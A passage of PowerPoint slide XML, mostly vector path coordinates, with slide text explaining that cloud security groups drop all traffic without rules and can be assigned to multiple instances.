                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184404" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295656" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405257" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513207" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924179" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021207" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115695" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382141" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464818" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544320" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620393" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692910" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761617" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826641" y="965707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="1423669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236343" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2163444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2388870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236343" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887982" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826895" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761998" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693291" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826008" y="4332528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724408" y="4367047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620522" y="4396651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514731" y="4421136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407035" y="4440529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297434" y="4454512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186309" y="4463110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="4491596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300990" y="4482858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521081" y="4448975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628396" y="4424133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937133" y="4319295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035304" y="4274807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130935" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223772" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400429" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484122" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714881" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911985" y="3515359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969643" y="3425316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022856" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190623" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220468" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245233" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278634" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264410" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190369" y="1615693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155444" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071243" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022221" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968754" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911096" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849120" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783207" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713484" y="783843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482471" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311656" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033018" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934720" y="231393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833882" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730885" y="156844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518160" y="102107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408940" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297815" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185166" y="59943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="73152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69596" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73152" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="71755" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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632453" y="384733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75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632453" y="384733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632453" y="755218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70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="317580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="356411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="390244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="418158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="439235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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="418158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="390244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="356411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="317580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="274670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632453" y="755218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70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="317580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="356411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="390244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="418158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="439235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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="418158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="390244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="356411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="317580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="27467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42282" y="492937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42282" y="492937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3994" y="644880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17BE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3994" y="644880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4366640" y="3848227"/>
            <a:ext cx="6045835" cy="14376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It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>drops</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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no</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rules.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</a:pPr>
            <a:endParaRPr sz="3800">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="849630">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>assigned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484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3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>instances.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66640" y="6296914"/>
            <a:ext cx="9112885" cy="17722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849630">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Instances</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E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0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4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same</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>assigned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="849630">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>groups.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37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Multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>assigned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484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0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same</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>instance.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609344" y="4567428"/>
            <a:ext cx="2537460" cy="2537460"/>
            <a:chOff x="1609344" y="4567428"/>
            <a:chExt cx="2537460" cy="2537460"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1609344" y="4567428"/>
              <a:ext cx="2537460" cy="2537460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2537460" h="2537459">
                  <a:moveTo>
                    <a:pt x="1268730" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1220067" y="916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171867" y="3642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124164" y="8147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076989" y="14396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030376" y="22357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984358" y="31997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938967" y="43284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894236" y="56184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850199" y="70664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806887" y="86692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764335" y="104234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722574" y="123259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681638" y="143732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641559" y="165622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602370" y="188895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564105" y="213518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526796" y="239459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490476" y="266685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455177" y="295162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420934" y="324859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387777" y="355742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355742" y="387777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324859" y="420934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295162" y="455177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266685" y="490476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239459" y="526796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213518" y="564105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188895" y="602370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165622" y="641559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143732" y="681638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123259" y="722574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104234" y="764335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86692" y="806887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70664" y="850199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56184" y="894236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43284" y="938967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31997" y="984358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22357" y="1030376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14396" y="1076989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8147" y="1124164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3642" y="1171867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916" y="1220067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1268730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916" y="1317392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3642" y="1365592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8147" y="1413295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14396" y="1460470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22357" y="1507083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31997" y="1553101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43284" y="1598492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56184" y="1643223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70664" y="1687260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86692" y="1730572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104234" y="1773124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123259" y="1814885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143732" y="1855821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165622" y="1895900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188895" y="1935089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213518" y="1973354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239459" y="2010663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266685" y="2046983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295162" y="2082282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324859" y="2116525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355742" y="2149682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387777" y="2181717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420934" y="2212600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455177" y="2242297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490476" y="2270774"/>
                  </a:lnTo>
                  <a:lnTo>
